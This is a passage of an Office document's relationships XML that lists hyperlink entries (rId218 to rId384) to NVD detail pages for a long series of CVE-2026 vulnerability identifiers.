Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89465" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89469" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89470" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89471" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89504" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89560" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89588" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89599" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89603" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89615" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89744" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54174" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80469" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57161" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79645" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80985" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89090" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89554" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89586" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89632" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89665" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89711" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90451" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19991" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49464" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80132" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80133" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81003" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85237" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87606" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89524" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89535" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89547" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89583" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89667" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89682" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89709" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19820" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21087" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21090" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21091" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69426" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69456" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69476" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69489" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69583" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69589" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69593" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69594" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69787" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78484" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78493" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80178" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80928" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80929" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80931" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80933" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80936" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80944" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80947" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80950" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80952" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80954" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80955" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80959" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80961" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80962" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80971" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80975" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80977" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80978" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80979" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80982" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80991" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80992" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80994" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80995" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81000" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81001" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81006" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81008" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81010" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81015" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8301" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8303" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89161" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89436" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89440" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89441" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89442" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89472" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89486" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89487" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89488" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89489" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89497" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89499" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89500" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89501" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89503" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89507" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89508" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89510" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89520" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89522" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89523" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89540" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89545" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89548" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89553" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89557" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89559" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89562" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89563" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89564" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89570" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89573" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89574" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89579" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89580" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89581" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89584" TargetMode="External" Id="rId384" /><Relationship 